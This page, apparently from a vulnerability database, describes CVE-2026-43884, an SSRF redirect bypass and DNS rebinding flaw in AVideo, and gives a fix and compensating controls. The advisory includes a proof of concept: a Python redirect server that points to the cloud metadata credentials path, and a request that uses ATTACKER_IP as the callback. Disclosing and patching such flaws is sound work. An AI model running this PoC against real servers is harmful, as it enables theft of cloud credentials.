AVideo CVE-2026-43884
HIGHSeverity by source
AV:N/AC:L/PR:L/UI:N/S:C/C:H/I:N/A:N
Primary rating from GitHub Advisory · only source for this CVE.
CVSS VectorGitHub Advisory
CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:H/I:N/A:N
Lifecycle Timeline
2DescriptionGitHub Advisory
Summary
Two endpoints in AVideo call isSSRFSafeURL() to validate user-supplied URLs, then fetch them using bare file_get_contents() without disabling PHP's automatic redirect following. An attacker can supply a URL pointing to a server they control that returns a 302 redirect to an internal/cloud-metadata address (e.g., http://169.254.169.254/latest/meta-data/). Since isSSRFSafeURL() only validates the *initial* URL, the redirect target bypasses all SSRF protections.
A secondary finding is that 6+ callers of isSSRFSafeURL() discard the $resolvedIP out-parameter meant for DNS pinning, leaving them vulnerable to DNS rebinding TOCTOU attacks.
Severity: High - CVSS 3.1: 7.7 (AV:N/AC:L/PR:L/UI:N/S:C/C:H/I:N/A:N)
Details
Finding 1: Redirect-Based SSRF Bypass
Vulnerable code - plugin/AI/receiveAsync.json.php (line ~162-165):
// SSRF Protection: Validate URL before fetching
if (!isSSRFSafeURL($imageUrl)) {
// blocked
} else {
$imageContent = file_get_contents($imageUrl); // ← FOLLOWS REDIRECTS!
}Vulnerable code - objects/EpgParser.php (line ~358-362):
if (!isSSRFSafeURL($this->url)) {
throw new \RuntimeException('URL blocked by SSRF protection');
}
$this->content = @file_get_contents($this->url); // ← FOLLOWS REDIRECTS!Safe code for comparison - objects/functions.php, url_get_contents():
$opts = ['http' => ['follow_location' => 0]]; // Disable auto-redirect
$context = stream_context_create($opts);
for ($redirectCount = 0; $redirectCount <= 5; $redirectCount++) {
$fetched = file_get_contents($currentUrl, false, $context);
// ... parse Location header ...
if ($redirectTarget) {
if (!isSSRFSafeURL($redirectTarget)) { // Re-validates EACH hop
return false;
}
$currentUrl = $redirectTarget;
continue;
}
$tmp = $fetched;
break;
}Root cause: The SSRF redirect protection (follow_location=0 + manual redirect loop with per-hop isSSRFSafeURL() re-validation) was correctly implemented in url_get_contents() but NOT propagated to these two endpoints that call file_get_contents() directly. PHP's default follow_location is 1 (follow redirects).
Finding 2: DNS Rebinding TOCTOU (Multiple Callers)
isSSRFSafeURL() provides a $resolvedIP out-parameter for DNS pinning via CURLOPT_RESOLVE. Only 1 of 9 callers (plugin/LiveLinks/proxy.php) uses it. The remaining 8 callers discard it and pass the original hostname to the fetching function, which resolves DNS independently - creating a TOCTOU race window exploitable via DNS rebinding (TTL=0).
Affected callers (no DNS pinning):
objects/aVideoEncoderReceiveImage.json.php- 4 call sitesobjects/aVideoEncoder.json.php- 1 call siteplugin/BulkEmbed/save.json.php- 1 call siteplugin/AI/receiveAsync.json.php- 1 call siteobjects/EpgParser.php- 1 call siteplugin/Scheduler/Scheduler.php- 1 call site
PoC
Redirect Bypass PoC
- Attacker runs an HTTP server that returns a 302 redirect:
from http.server import HTTPServer, BaseHTTPRequestHandler
class RedirectHandler(BaseHTTPRequestHandler):
def do_GET(self):
self.send_response(302)
self.send_header("Location", "http://169.254.169.254/latest/meta-data/iam/security-credentials/")
self.end_headers()
HTTPServer(("0.0.0.0", 8888), RedirectHandler).serve_forever()- Attacker triggers AI image generation and intercepts the callback:
POST /plugin/AI/receiveAsync.json.php
Content-Type: application/x-www-form-urlencoded
type=image&token=VALID_TOKEN&ai_responses_id=ID&response[data][0][url]=http://ATTACKER_IP:8888/redirisSSRFSafeURL("http://ATTACKER_IP:8888/redir")resolves attacker IP → public → passesfile_get_contents("http://ATTACKER_IP:8888/redir")follows 302 tohttp://169.254.169.254/...- no SSRF re-check occurs- Cloud metadata (including IAM credentials) is saved as a video thumbnail, retrievable by the attacker
Control test: Replace the redirect target with a legitimate public URL - isSSRFSafeURL() passes and the content is fetched normally, confirming the function works for non-malicious URLs.
DNS Rebinding PoC
- Configure a domain with TTL=0 DNS that alternates:
- First query: public IP (passes
isSSRFSafeURL) - Second query:
127.0.0.1(reaches internal services)
- Submit
http://rebind.attacker.com/image.jpgto any affected endpoint isSSRFSafeURL()resolves → public IP → passes (discards$resolvedIP)url_get_contents()/file_get_contents()resolves again →127.0.0.1→ SSRF achieved
Impact
An authenticated attacker can force the AVideo server to make HTTP requests to arbitrary internal hosts, including:
- Cloud metadata endpoints (169.254.169.254) - exfiltrate IAM credentials, instance identity
- Internal services on localhost or private network (databases, admin panels, monitoring)
- Port scanning of the internal network using the server as a proxy
The exfiltrated data is stored as video thumbnails/images, making it retrievable through the application's public interface.
Suggested Fix
Fix 1 (Redirect bypass - immediate): Route both affected files through url_get_contents() which already handles redirects safely, or add explicit no-redirect context:
$ctx = stream_context_create(['http' => ['follow_location' => 0]]);
$imageContent = file_get_contents($imageUrl, false, $ctx);Fix 2 (DNS rebinding - defense-in-depth): Update all callers to capture $resolvedIP and pass it to a DNS-pinning-aware fetch function using CURLOPT_RESOLVE.
Credit
Kai Aizen <kai.aizen.dev@gmail.com>
AnalysisAI
Server-Side Request Forgery (SSRF) in AVideo versions up to 29.0 allows authenticated attackers to exfiltrate cloud metadata credentials and access internal services via HTTP redirect bypass and DNS rebinding attacks. Two endpoints in AVideo's AI plugin and EPG parser validate user-supplied URLs using isSSRFSafeURL() but then fetch them with file_get_contents() using PHP's default automatic redirect following. An attacker supplies a URL to a controlled server returning a 302 redirect to internal resources (e.g., AWS instance metadata at 169.254.169.254), bypassing SSRF protections since only the initial URL is validated. Vendor-released patch available via GitHub commit 603e7bf7. CVSS 7.7 reflects Changed Scope due to cross-boundary access to cloud infrastructure credentials.
Technical ContextAI
This vulnerability exploits a Time-of-Check-Time-of-Use (TOCTOU) flaw in PHP's file_get_contents() function when handling HTTP redirects. PHP's default stream context enables automatic redirect following (follow_location=1), meaning the function transparently follows HTTP 30x responses without exposing redirect targets to application code. AVideo's isSSRFSafeURL() function validates DNS resolution and blocks private IP ranges, cloud metadata endpoints, and localhost addresses, but only checks the initially supplied URL. When file_get_contents() follows a redirect, the Location header URL bypasses all validation. The codebase includes a correctly implemented safe wrapper (url_get_contents() in objects/functions.php) that disables automatic redirects, manually parses Location headers, and re-validates each redirect hop through isSSRFSafeURL(), but two critical endpoints (plugin/AI/receiveAsync.json.php and objects/EpgParser.php) call file_get_contents() directly. A secondary DNS rebinding issue (CWE-350) exists where eight of nine isSSRFSafeURL() callers discard the $resolvedIP parameter meant for DNS pinning via CURLOPT_RESOLVE, creating TOCTOU windows where DNS can be re-resolved between validation and fetching. The CPE identifier pkg:composer/wwbn_avideo confirms this affects the PHP/Composer package.
RemediationAI
Apply the vendor patch immediately via GitHub commit 603e7bf77a835584387327e35560262feb075db3 (https://github.com/WWBN/AVideo/commit/603e7bf77a835584387327e35560262feb075db3), which replaces vulnerable file_get_contents() calls with the existing url_get_contents() wrapper that disables automatic redirects and validates each redirect hop. No fixed version number is specified in the advisory; administrators should pull from the main branch post-patch commit or monitor for release announcements at https://github.com/WWBN/AVideo. If immediate patching is not feasible, implement the following compensating controls with trade-offs: (1) Block outbound HTTP/HTTPS from the AVideo server to 169.254.0.0/16, 10.0.0.0/8, 172.16.0.0/12, 192.168.0.0/16, and 127.0.0.0/8 via host firewall or cloud security groups - this prevents metadata access but may break legitimate internal API integrations; verify no internal services are needed before deploying. (2) Disable AI plugin endpoints and EPG parsing features if not business-critical - this eliminates attack surface but removes functionality. (3) Restrict authenticated user privileges and audit accounts with access to AI image generation features - reduces attacker pool but does not eliminate risk from compromised or insider accounts. Network-level controls are preferred over disabling features. Defense-in-depth: deploy instance metadata service v2 (IMDSv2) on AWS EC2 which requires session tokens via PUT requests, blocking simple GET-based SSRF; similar hardening available on GCP and Azure.
Wazuh SIEM platform versions 4.4.0 through 4.9.0 contain an unsafe deserialization vulnerability in the DistributedAPI t
BentoML version 1.4.2 and earlier contains an unauthenticated remote code execution vulnerability through insecure deser
pgAdmin 4 contains critical remote code execution vulnerabilities in the Query Tool download and Cloud Deployment endpoi
The renderLocalView function in render/views.py in graphite-web in Graphite 0.9.5 through 0.9.10 uses the pickle Python
BentoML is a Python library for building online serving systems optimized for AI apps and model inference. Rated critica
OpenSSL before 0.9.8za, 1.0.0 before 1.0.0m, and 1.0.1 before 1.0.1h does not properly restrict processing of ChangeCiph
pyLoad download manager version prior to 0.5.0b3.dev77 exposes the Flask SECRET_KEY through an unauthenticated endpoint.
In Mercurial before 4.1.3, "hg serve --stdio" allows remote authenticated users to launch the Python debugger, and conse
Unauthenticated remote code execution in Marimo ≤0.20.4 allows attackers to execute arbitrary system commands via the `/
pyLoad is the free and open-source Download Manager written in pure Python. Rated medium severity (CVSS 5.3), this vulne
Langflow (a visual LLM pipeline builder) contains a critical unauthenticated code execution vulnerability (CVE-2026-3301
Cross-user flow execution in Langflow (< 1.9.1) lets any authenticated API-key holder run another user's flow by passing
Same weakness CWE-918 – Server-Side Request Forgery (SSRF)
View allShare
External POC / Exploit Code
Leaving vuln.today
GHSA-2hch-c97c-g99x